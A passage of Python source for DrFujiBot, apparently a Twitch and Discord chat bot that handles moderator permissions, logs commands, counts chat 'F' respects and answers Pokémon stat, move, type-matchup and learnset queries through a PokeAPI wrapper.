return True
run_cmd = self.get_current_run_data(cmd)
if None != run_cmd:
return True
return False
def is_moderator_command(self, cmd):
cmds = [
"!rip",
"!ez",
"!event",
"!close",
"!cancel",
"!resolve",
"!riprun",
"!setrun",
"!addshoutout",
"!removeshoutout",
"!adduser",
"!removeuser",
"!addcom",
"!editcom",
"!delcom",
"!setdeaths",
"!remind",
"!addquote",
"!delquote",
"!swearjar",
"!define",
"!credit",
"!so",
"!shoutout",
]
for c in cmds:
if cmd.startswith(c):
return True
return False
def log_cmd(self, cmd, sourcenick):
if self.is_valid_command(cmd):
if True == self.whisperMode:
if self.bot_type and self.bot_type == "discord":
logname = 'whisper_discord.log'
else:
logname = 'whisper.log'
else:
logname = self.username + ".log"
with open(logname, "a") as f:
f.write(sourcenick + " - " + cmd + "\n")
f.flush()
def on_nicknameinuse(self, c, e):
c.nick(c.get_nickname() + "_")
def on_welcome(self, c, e):
g_c = c
if True == self.whisperMode:
c.cap('REQ', ':twitch.tv/commands')
print("Ready for whisper mode")
else:
c.join(self.channel)
print("Joined chat for %s" % (self.channel))
c.cap('REQ', ":twitch.tv/tags")
def on_privmsg(self, c, e):
pass
def on_whisper(self, c, e):
line = e.arguments[0]
self.log_cmd(line, e.source.nick)
self.processCommand(line, c, e.source.nick)
if e.source.nick.lower() not in self.previous_users:
self.output_msg(c, "I see this may be your first time using DrFujiBot! Feel free to check out the documentation: http://goo.gl/JGG3LT", e.source.nick)
self.previous_users[e.source.nick.lower()] = 1
with open('whisper_users.json', 'w') as config_file:
config_file.write(json.dumps(self.previous_users))
def on_discord_msg(self, line, source_user, source_id):
if source_user in self.permitted_users or self.permissions is False or is_global_command(line):
self.log_cmd(line, source_user)
c = None
self.processCommand(line, c, source_user, source_id)
def handle_raid_or_meme(self, c, line):
if self.meme_mode:
if "pokemonchallenges" == self.username.lower():
if self.last_line == line and line != "F" and line != "f":
self.same_counter += 1
else:
if self.same_counter >= 5 and self.last_line != "F" and self.last_line != "f":
self.output_msg(c, str(self.same_counter) + "x combo ( " + self.last_line + " )", "drfujibot")
if self.same_counter > self.config['highest_combo'][0]:
pair = []
pair.append(self.same_counter)
pair.append(self.last_line)
self.config['highest_combo'] = pair
self.update_config()
self.same_counter = 1
self.last_line = line
line_dict = {}
for e in self.last_lines:
if e[1].lower() != 'drfujibot':
if line_dict.get(e[1]):
line_dict[e[1]] += 1
else:
line_dict[e[1]] = 1
check_unique_users = False
meme = ''
for k in line_dict.keys():
if line_dict[k] > 5:
check_unique_users = True
meme = k
break
user_list = []
if check_unique_users:
for u in self.last_lines:
user_list.append(u)
user_list = list(set(user_list))
# if more than 3 unique users are spamming the same thing, participate in the raid/meme!
if len(user_list) >= 3:
if "f" != meme and "F" != meme and "pokemoF" != meme and "EZ" != meme:
#self.output_msg(c, meme, "drfujibot")
pass
def handle_cheer(self, source_user, num_bits):
print("Handling cheer for " + str(num_bits) + " bits from " + source_user)
def handle_auto_shoutout(self, c, user):
auto_shoutout_list = self.config.get('auto_shoutout')
if None != auto_shoutout_list and user in auto_shoutout_list:
now = datetime.datetime.now()
if self.config['last_auto_shoutout'].get(user):
last = datetime.datetime.fromtimestamp(self.config['last_auto_shoutout'][user])
else:
last = now - datetime.timedelta(hours=25)
diff = now - last
if diff.days >= 1:
self.do_shoutout(c, user, self.config['shoutout_messages'], random.randint(5, 10), "drfujibot")
timestamp = time.mktime(now.timetuple())
self.config['last_auto_shoutout'][user] = timestamp
self.update_config()
def on_pubmsg(self, c, e):
line = e.arguments[0]
if "TwitchPlaysShowdown" in self.username and \
( "DrFujiBot won the battle" in line or \
"DrFujiBot lost the battle" in line ) and \
"drfujibot" in e.source.nick:
print('match')
self.output_msg(c, "!chatbattle", e.source.nick)
return
self.handle_respects(c, line, e.source.nick, discord=False)
if len(self.last_lines) > 5:
self.last_lines = self.last_lines[1:]
self.last_lines.append((e.source.nick, line))
self.handle_raid_or_meme(c, line)
#self.handle_auto_shoutout(c, e.source.nick)
is_mod = False
is_sub = False
for tag in e.tags:
if tag['key'] == 'bits':
self.handle_cheer(e.source.nick, int(tag['value']))
break
elif tag['key'] == 'badges':
if tag['value']:
badges = tag['value'].split(',')
for b in badges:
if b.split('/')[0] == 'moderator' or b.split('/')[0] == 'broadcaster':
is_mod = True
elif b.split('/')[0] == 'subscriber':
is_sub = True
if self.is_valid_command(line) or self.is_extra_command(line):
if self.is_moderator_command(line):
if e.source.nick.lower() in self.moderators or \
'drfujibot' == e.source.nick.lower() or \
is_mod:
self.log_cmd(line, e.source.nick)
self.processCommand(line, c, e.source.nick)
else:
if e.source.nick.lower() in self.permitted_users or \
(is_sub and self.username.lower() == "pokemonchallenges") or \
self.permissions is False or \
is_global_command(line) or \
self.is_extra_command(line):
self.log_cmd(line, e.source.nick)
self.processCommand(line, c, e.source.nick)
else:
if not ( line.startswith("!commands") or line.startswith("!so ") or line.startswith("!shoutout ") or line.startswith("!help") ):
if self.username.lower() == "pokemonchallenges":
self.output_msg(c, "Sorry, that command is only for mods or subs, but you can whisper me!", e.source.nick)
else:
self.output_msg(c, "Sorry, that command is only for mods, but you can whisper me!", e.source.nick)
def handle_respects(self, c, line, source_user, discord):
if self.ez:
now = time.time()
if now - self.ez_start >= 20:
num_respects = self.ez_count
self.output_msg(c, str(num_respects) + " EZ 's for PC", source_user)
self.ez = False
else:
if line.startswith("EZ ") or line == "EZ":
self.ez_count += 1
if len(self.current_deaths.keys()) > 0:
now = time.time()
names_to_delete = []
# One F counts for all respects in progress
for name in self.current_deaths.keys():
if now - self.current_deaths[name] >= 20:
num_respects = len(self.deaths_dict[name])
self.fallen[name] = num_respects
self.fallen_timestamps[name] = now
self.output_msg(c, str(num_respects) + " respects for " + name, source_user)
self.config['fallen'] = self.fallen
self.config['fallen_timestamps'] = self.fallen_timestamps
self.update_config()
names_to_delete.append(name)
else:
if line.upper() == "F" or line == "pokemoF":
if source_user not in self.deaths_dict[name]:
self.deaths_dict[name].append(source_user)
for n in names_to_delete:
del self.current_deaths[n]
def update_config(self):
configname = ""
if self.bot_type and self.bot_type == 'discord':
configname = self.username + '_discord.json'
else:
configname = self.username + '.json'
with open(configname, 'w') as config_file:
config_file.write(json.dumps(self.config))
def update_pcce(self):
with open('PCCE.json', 'w') as config_file:
config_file.write(json.dumps(self.pcce))
def update_coin_data(self):
with open(self.username + '_coins.json', 'w') as config_file:
config_file.write(json.dumps(self.coin_data))
if "pokemonchallenges" == self.username.lower() or "pokemonrealtime" == self.username.lower():
self.pcce['coins'] = self.coin_data['coins']
self.update_pcce()
def processCommand(self, line, c, source_user, source_id=None, prefix=None):
if " " in line:
line_start = ""
for char in line:
if " " != char:
line_start += char.lower()
else:
break
line = line_start + " " + line.split(" ", 1)[1]
else:
line = line.lower()
print(line)
if len(self.config['command_whitelist']) > 0:
command = line
if ' ' in command:
command = command.split(' ')[0]
if command not in self.config['command_whitelist']:
return
if line.startswith("!permissions") and len(line) >= len("!permissions ") + 2:
#toggle = line.split(" ")[1].rstrip("\n").rstrip("\r")
#if "on" in toggle:
# self.permissions = True
# self.output_msg(c, "Only permitted users can talk to me!", source_user)
#elif "off" in toggle:
# self.permissions = False
# self.output_msg(c, "Everyone can talk to me!", source_user)
pass
elif line.startswith("!commands") or line.startswith("!help") or line.startswith("!drfujihelp"):
should_output = False
if line.startswith("!commands"):
if True == self.config['extra_commands_on']:
should_output = True
else:
should_output = True
if should_output:
output = "See the documentation for commands and help: http://goo.gl/JGG3LT"
self.output_msg(c, output, source_user)
elif line.startswith("!sprite "):
if len(line.split(" ")) >= 2:
pokemon = line.split(" ")[1].rstrip("\n").rstrip("\r")
self.output_msg(c, pokemon.capitalize() + " sprite: http://everoddish.com/RedbYNv.png", source_user)
else:
self.output_msg(c, "Format: !sprite <pokemon>", source_user)
elif line == "!bee":
out = ""
while len(out) < 12:
out += self.bee[ self.bee_index ]
self.bee_index += 1
if len(out) <= 11:
out += " "
while len(out) > 12:
out = " ".join(out.split(" ")[:-1])
self.bee_index -= 1
self.output_msg(c, out, source_user)
self.config['bee_index'] = self.bee_index
self.update_config()
elif line == "!shaq":
out = ""
while len(out) < 12:
out += self.shaq[ self.shaq_index ]
self.shaq_index += 1
if self.shaq_index >= len(self.shaq):
self.shaq_index = 0
if len(out) <= 11:
out += " "
while len(out) > 12:
out = " ".join(out.split(" ")[:-1])
self.shaq_index -= 1
if self.shaq_index <= 0:
self.shaq_index = len(self.shaq) - 1
self.output_msg(c, out, source_user)
self.config['shaq_index'] = self.shaq_index
self.update_config()
elif line.startswith("!honestly"):
if self.username.lower() == "pokemonchallenges":
if len(line.split(" ")) >= 3:
victim = line.split(" ")[1].rstrip("\n").rstrip("\r")
killer = line.split(" ")[2].rstrip("\n").rstrip("\r")
else:
victim = "Medicham"
killer = "Tangrowth"
output = "Honestly PC fuck you. That "
output += victim
output += " was the only mon I was ever attached to in this run and it did so much in the E4 and then you go and act all confident with it and keep it in on a "
output += killer
self.output_msg(c, output, source_user)
elif line.startswith("!whisper"):
output = "Only the following users have DrFujiBot permission: "
output += ", ".join(self.permitted_users)
output += " - If you want to use DrFujiBot yourself, send it a whisper!"
self.output_msg(c, output, source_user)
elif line.startswith("!pokemon"):
if len(line.split(" ")) >= 2:
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
p = drfujibot_pykemon.api.get(pokemon=name,url=self.config['pokeapi_url'])
type1 = p.types[0].capitalize()
type2 = None
if len(p.types) > 1:
type2 = p.types[1].capitalize()
output = name.capitalize() + ": [" + type1
if type2:
output += ", " + type2 + "] "
else:
output += "] "
output += "HP(" + str(p.hp) + ") "
output += "Attack(" + str(p.attack) + ") "
output += "Defense(" + str(p.defense) + ") "
output += "Sp. Atk(" + str(p.sp_atk) + ") "
output += "Sp. Def(" + str(p.sp_def) + ") "
output += "Speed(" + str(p.speed) + ") "
output += "Abilities: "
for a in p.abilities:
output += a.replace('-', ' ').title()
output += ", "
current_gen = genNameToNum(self.get_game_group(source_user))
if len(p.hidden_ability) == 1 and current_gen >= 5:
output += p.hidden_ability[0].replace('-', ' ').title()
output += ' (HA)'
else:
output = output.rsplit(", ", 1 )[0]
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
if len(suggestions) > 0:
self.processCommand("!pokemon " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!offen"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
p = drfujibot_pykemon.api.get(pokemon=name,url=self.config['pokeapi_url'])
output = name.capitalize() + ": "
output += "Attack(" + str(p.attack) + ") "
output += "Sp. Atk(" + str(p.sp_atk) + ") "
output += "Speed(" + str(p.speed) + ") "
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
if len(suggestions) > 0:
self.processCommand("!offen " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!defen"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
p = drfujibot_pykemon.api.get(pokemon=name,url=self.config['pokeapi_url'])
output = name.capitalize() + ": "
output += "HP(" + str(p.hp) + ") "
output += "Defense(" + str(p.defense) + ") "
output += "Sp. Def(" + str(p.sp_def) + ") "
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
if len(suggestions) > 0:
self.processCommand("!defen " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!abilities"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
p = drfujibot_pykemon.api.get(pokemon=name,url=self.config['pokeapi_url'])
output = name.capitalize() + ": "
for a in p.abilities:
output += a.replace('-', ' ').title()
output += ", "
current_gen = genNameToNum(self.get_game_group(source_user))
if len(p.hidden_ability) == 1 and current_gen >= 5:
output += p.hidden_ability[0].replace('-', ' ').title()
output += ' (HA)'
else:
output = output.rsplit(", ", 1 )[0]
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
if len(suggestions) > 0:
self.processCommand("!abilities " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!move"):
name = line.split(" ", 1)[1].rstrip("\n").rstrip("\r").lower()
try:
name = name.replace(" ", "-")
name = name.replace(",", "-")
name = fix_z_move(name)
m = drfujibot_pykemon.api.get(move=name,url=self.config['pokeapi_url'])
# Go through all the past values, and apply any ones that are relevant.
for pv in m.past_values:
if genNameToNum(self.get_game_group(source_user)) <= genNameToNum(pv.get('version_group').get('name')):
if pv.get('pp'):
m.pp = pv.get('pp')
elif pv.get('power'):
m.power = pv.get('power')
elif pv.get('accuracy'):
m.accuracy = pv.get('accuracy')
elif pv.get('type'):
m.type = pv.get('type')
elif pv.get('effect_chance'):
m.ailment_chance = pv.get('effect_chance')
if prefix:
output = prefix
else:
output = ""
output += name.replace("-", " ").title() + ": [" + m.type.capitalize() + "] "
output += "BasePower(" + str(m.power) + ") Class(" + m.damage_class.capitalize() + ") "
output += "Accuracy(" + str(m.accuracy) + ") PP(" + str(m.pp) + ") "
if m.flinch_chance > 0:
output += "Flinch(" + str(m.flinch_chance) + "%) "
if len(m.ailment) > 0 and m.ailment_chance > 0:
output += m.ailment.capitalize() + "(" + str(m.ailment_chance) + "%) "
if m.crit_rate == 1:
output += "Crit(+) "
if m.priority == 1:
output += "Priority(+) "
for s in m.stat_changes:
stat = s[0].capitalize()
stat = stat.replace("Special-attack", "SpAtk")
stat = stat.replace("Special-defense", "SpDef")
output += "Stat(" + stat + " "
if s[1] < 0:
output += str(s[1])
else:
output += "+" + str(s[1])
if m.stat_chance > 0:
output += " " + str(m.stat_chance) + "%"
output += ") "
m.description = m.description.replace("$effect_chance", str(m.stat_chance))
output += m.description
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Move '" + name + "' not found."
#suggestions = self.move_corrector.suggest(name.replace('-', ' ').title(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.move_corrector.suggest(name.replace('-', ' ').title(), limit=1)
if len(suggestions) > 0:
self.processCommand("!move " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Move '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!nature"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
try:
m = drfujibot_pykemon.api.get(nature=name)
output = name.capitalize() + ": "
m.inc_stat = m.inc_stat.capitalize()
m.dec_stat = m.dec_stat.capitalize()
if "None" in m.inc_stat:
output += "Neutral"
else:
m.inc_stat = m.inc_stat.replace("Special-attack", "SpAtk")
m.inc_stat = m.inc_stat.replace("Special-defense", "SpDef")
output += "+" + m.inc_stat + " "
m.dec_stat = m.dec_stat.replace("Special-attack", "SpAtk")
m.dec_stat = m.dec_stat.replace("Special-defense", "SpDef")
output += "-" + m.dec_stat + " "
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
self.output_msg(c, "Nature '" + name + "' not found.", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!ability"):
name = line.split(" ", 1)[1].rstrip("\n").rstrip("\r").lower()
try:
name = name.replace(" ", "-")
a = drfujibot_pykemon.api.get(ability=name,url=self.config['pokeapi_url'])
current_gen = genNameToNum(self.get_game_group(source_user))
if current_gen >= a.gen_num:
if prefix:
output = prefix
else:
output = ""
output += name.replace('-', ' ').title() + ": "
output += a.effect
else:
output = "Ability '" + name.title() + "' is not present in Gen " + str(current_gen)
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
self.output_msg(c, "Ability '" + name + "' not found.", source_user)
except Exception as e:
print("Unexpected error: " + str(e))
# !does <pokemon> learn <move>
elif line.startswith("!does"):
regex = re.compile("!does (.*) learn (.*)")
result = regex.match(line)
poke = None
move = None
if result:
poke = result.group(1).lower()
poke = fix_pokemon_name(poke)
move = result.group(2).lower()
move = move.replace(" ", "-")
else:
self.output_msg(c, "Invalid format. Usage: !does <pokemon> learn <move>", source_user)
if poke and move:
p = None
try:
p = drfujibot_pykemon.api.get(pokemon=poke,url=self.config['pokeapi_url'])
try:
# Just for move name validation:
m = drfujibot_pykemon.api.get(move=move,url=self.config['pokeapi_url'])
info_list = [move_info for move_info in p.moves if move in move_info.get('move').get('name')]
info_list_by_gen = []
for i in info_list:
for version in i.get('version_group_details'):
gen_name = version.get('version_group').get('name')
if self.get_game_group(source_user) == gen_name:
info_list_by_gen.append(version)
if len(info_list_by_gen) > 0:
output = poke.capitalize() + " learns " + move.replace("-", " ").title() + " "
output_chunks = []
for info in info_list_by_gen:
learn = info.get('move_learn_method').get('name')
if "machine" in learn:
learn = "TM/HM"
if "level-up" in learn:
output_chunks.append("by level up at level " + str(info.get('level_learned_at')))
else:
output_chunks.append("by " + learn)
output_chunks_set = list(set(output_chunks))
if len(output_chunks_set) > 1:
output += ", ".join(output_chunks_set[:-1])
output += " and "
output += output_chunks_set[-1]
else:
output += output_chunks_set[0]
else:
output = poke.capitalize() + " does not learn " + move.replace("-", " ").title()
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#self.output_msg(c, "Move '" + move + "' not found.", source_user)
#suggestions = self.move_corrector.suggest(move.replace('-', ' ').title(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.move_corrector.suggest(move.replace('-', ' ').title(), limit=1)
if len(suggestions) > 0:
self.processCommand("!does " + poke + " learn " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Move '" + move + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + poke + "' not found."
#suggestions = self.pokemon_corrector.suggest(poke.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(poke.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!does " + suggestions[0] + " learn " + move, c, source_user)
else:
self.output_msg(c, "Pokemon '" + poke + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!item"):
name = line.split(" ", 1)[1].rstrip("\n").rstrip("\r").lower()
try:
name = name.replace(" ", "-")
i = drfujibot_pykemon.api.get(item=name,url=self.config['pokeapi_url'])
output = name.replace('-', ' ').title() + ": " + i.description + " "
held_dict = {}
for detail in i.held_by_pokemon:
for ver in detail.get('version_details'):
if self.get_game(source_user) == ver.get('version').get('name'):
rarity = str(ver.get('rarity'))
poke = detail.get('pokemon').get('name').capitalize()
if held_dict.get(rarity):
held_dict[rarity].append(poke)
else:
held_dict[rarity] = [poke]
for k in held_dict.keys():
output += "There is a " + k + "% chance of the following wild Pokemon holding this item: "
output += ", ".join(held_dict[k])
output += " "
if len(held_dict.keys()) > 0:
output += ". "
if i.value > 0:
output += "This item can be sold for $" + str(i.value) + " "
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
self.output_msg(c, "Item '" + name + "' not found.", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!weak"):
type1 = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
type2 = None
if len(line.split(" ")) > 2:
type2 = line.split(" ")[2]
type2 = type2.rstrip("\n").rstrip("\r").lower()
weaknesses = get_weaknesses(type1, type2)
output = type1.capitalize()
if type2:
output += "/" + type2.capitalize()
output += " is weak to: "
weak_strings = []
for w in weaknesses:
string = w.capitalize()
if weaknesses.count(w) == 1:
string += " (2x)"
elif weaknesses.count(w) == 2:
string += " (4x)"
weak_strings.append(string)
weak_strings = list(set(weak_strings))
output += ", ".join(weak_strings)
self.output_msg(c, output, source_user)
elif line.startswith("!resist"):
type1 = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
type2 = None
if len(line.split(" ")) > 2:
type2 = line.split(" ")[2]
type2 = type2.rstrip("\n").rstrip("\r").lower()
resistances = get_resistances(type1, type2)
# Print what's left
output = type1.capitalize()
if type2:
output += "/" + type2.capitalize()
output += " is resistant to: "
resist_strings = []
for r in resistances:
string = r.capitalize()
if resistances.count(r) == 1:
string += " (0.5x)"
elif resistances.count(r) == 2:
string += " (0.25x)"
resist_strings.append(string)
resist_strings = list(set(resist_strings))
output += ", ".join(resist_strings)
self.output_msg(c, output, source_user)
elif line.startswith("!type"):
regex = re.compile("!type (.*) against ([a-z]*) *([a-z]*)")
result = regex.match(line)
if result:
attacking_type = result.group(1).lower()
defending_type1 = result.group(2).lower()
defending_type2 = result.group(3)
if defending_type2:
defending_type2 = defending_type2.lower()
try:
t1 = drfujibot_pykemon.api.get(type=defending_type1)
t2 = None
if defending_type2:
t2 = drfujibot_pykemon.api.get(type=defending_type2)
weaknesses = [w.get('name') for w in t1.double_damage_from]
if t2:
for w in t2.double_damage_from:
weaknesses.append(w.get('name'))
resistances = [r.get('name') for r in t1.half_damage_from]
if t2:
for r in t2.half_damage_from:
resistances.append(r.get('name'))
no_dmg_types = [t.get('name') for t in t1.no_damage_from]
if t2:
for t in t2.no_damage_from:
no_dmg_types.append(t.get('name'))
# Take out no-damage types outright.
weaknesses = [w for w in weaknesses if w not in no_dmg_types]
resistances = [r for r in resistances if r not in no_dmg_types]
weaknesses_copy = weaknesses[:]
# Reduce weakness instance by one for each resistance.
for r in resistances:
if r in weaknesses:
weaknesses.remove(r)
# Reduce resistance instance by one for each weakness.
for w in weaknesses_copy:
if w in resistances:
resistances.remove(w)
# Print the result
output = attacking_type.capitalize()
if attacking_type in no_dmg_types:
output += " does no damage"
elif attacking_type in weaknesses:
output += " is super effective ("
if weaknesses.count(attacking_type) == 1:
output += "2x)"
elif weaknesses.count(attacking_type) == 2:
output += "4x)"
elif attacking_type in resistances:
output += " is not very effective ("
if resistances.count(attacking_type) == 1:
output += "0.5x)"
elif resistances.count(attacking_type) == 2:
output += "0.25x)"
else:
output += " does normal damage"
output += " against " + defending_type1.capitalize()
if defending_type2:
output += "/" + defending_type2.capitalize()
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
self.output_msg(c, "Type(s) not found.", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
else:
self.output_msg(c, "Invalid format. Usage: !type <attacking_type> against <defending_type1> <defending_type2>", source_user)
elif line.startswith("!learnset"):
regex = re.compile("!learnset (.*)")
result = regex.match(line)
poke = None
group = None
if result:
poke = result.group(1).lower()
poke = fix_pokemon_name(poke)
group = self.get_game_group(source_user)
else:
self.output_msg(c, "Invalid format. Usage: !learnset <pokemon>", source_user)
if poke and group:
output = poke.capitalize() + " "
try:
p = drfujibot_pykemon.api.get(pokemon=poke,url=self.config['pokeapi_url'])
entries = []
for move in p.moves:
for g in move.get('version_group_details'):
gen_name = g.get('version_group').get('name')
if group:
if group == gen_name:
level = g.get('level_learned_at')
if level > 0:
entries.append("| " + str(level) + " " + move.get('move').get('name').replace("-", " ").title() + " ")
entries = list(set(entries))
entries = sorted(entries, key=lambda x: int(x.split(" ")[1]))
for en in entries:
output += en
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + poke + "' not found."
#suggestions = self.pokemon_corrector.suggest(poke.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(poke.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!learnset " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + poke + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!tmset"):
regex = re.compile("!tmset (.*)")
result = regex.match(line)
poke = None
group = None
if result:
poke = result.group(1).lower()
poke = fix_pokemon_name(poke)
group = self.get_game_group(source_user)
else:
self.output_msg(c, "Invalid format. Usage: !tmset <pokemon>", source_user)
if poke.lower() == "mew":
self.output_msg(c, "Mew learns all the TMs. Stop trying to spam.", source_user)
else:
if poke and group:
output = poke.capitalize() + ": "
try:
p = drfujibot_pykemon.api.get(pokemon=poke,url=self.config['pokeapi_url'])
entries = []
for move in p.moves:
for g in move.get('version_group_details'):
gen_name = g.get('version_group').get('name')
if group:
if group == gen_name:
if 'machine' in g.get('move_learn_method').get('name'):
entries.append(move.get('move').get('name').replace("-", " ").title())
entries = list(set(entries))
output += ", ".join(map(str, entries))
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + poke + "' not found."
#suggestions = self.pokemon_corrector.suggest(poke.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(poke.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!tmset " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + poke + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!setgame"):
regex = re.compile("!setgame (.*)")
result = regex.match(line)
if result:
game = result.group(1)
valid_games = [
'red',
'blue',
'yellow',
'gold',
'silver',
'crystal',
'ruby',
'sapphire',
'emerald',
'fire-red',
'leaf-green',
'diamond',
'pearl',
'platinum',
'heart-gold',
'soul-silver',
'black',
'white',
'black-2',
'white-2',
'x',
'y',
'omega-ruby',
'alpha-sapphire',
'rising-ruby',
'sun',
'moon'
]
game = game.replace(' ', '-').lower()
if "ultra-sun" == game:
game = "sun"
if "ultra-moon" == game:
game = "moon"
original_game_str = game
isRising = False
isGen7 = False
if game == 'firered':
game = 'fire-red'
elif game == 'leafgreen':
game = 'leaf-green'
elif game == 'heartgold':
game = 'heart-gold'
elif game == 'soulsilver':
game = 'soul-silver'
elif game == 'omegaruby' or game == 'rising-ruby' or game == 'risingruby':
game = 'omega-ruby'
isRising = True
elif game == 'alphasapphire' or game == 'sinking-sapphire' or game == 'sinkingsapphire':
game = 'alpha-sapphire'
isRising = True
elif game == 'sun' or game == 'moon':
isGen7 = True
if game in valid_games:
config = None
if self.whisperMode == True:
if self.bot_type and self.bot_type == 'discord':
configname = 'whisper_discord.json'
else:
configname = 'whisper.json'
with open(configname, 'r') as config_file:
config = json.load(config_file)
if config:
config['games'][source_user] = game
if isRising:
config['pokeapi_url'] = 'http://localhost:8001/api/v2'
self.config['pokeapi_url'] = 'http://localhost:8001/api/v2'
else:
config['pokeapi_url'] = ''
self.config['pokeapi_url'] = ''
with open(configname, 'w') as config_file:
config_file.write(json.dumps(config))
else:
self.config['games'][self.username] = game
if isRising:
self.config['pokeapi_url'] = 'http://localhost:8001/api/v2'
else:
self.config['pokeapi_url'] = ''
if None != self.config.get('current_run') and len(self.config.get('current_run')) > 0 and None != self.config.get('run_data'):
self.config['run_data'][self.config['current_run']]['game'] = game
self.update_config()
self.game = game
output = "Set game to Pokemon " + original_game_str.replace('-', ' ').title() + " SeemsGood"
self.output_msg(c, output, source_user)
else:
self.output_msg(c, "Invalid game. Usage: !setgame <game name>", source_user)
else:
self.output_msg(c, "Invalid format. Usage: !setgame <game name>", source_user)
elif line.startswith("!evol"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
species = drfujibot_pykemon.api.get(species=name,url=self.config['pokeapi_url'])
chain_id = species.evolution_chain_url.split("/")[-2]
ch = drfujibot_pykemon.api.get(evo_chain=chain_id,url=self.config['pokeapi_url'])
this_chain = find_chain(ch.chain, name)
output = ""
if len(this_chain.get('evolves_to')) == 0:
found_mega = False
for var in species.varieties:
if var.get('pokemon').get('name').endswith('-mega'):
output += name.capitalize() + " mega evolves to Mega " + name.capitalize()
found_mega = True
break
if not found_mega:
output += name.capitalize() + " does not evolve any further."
else:
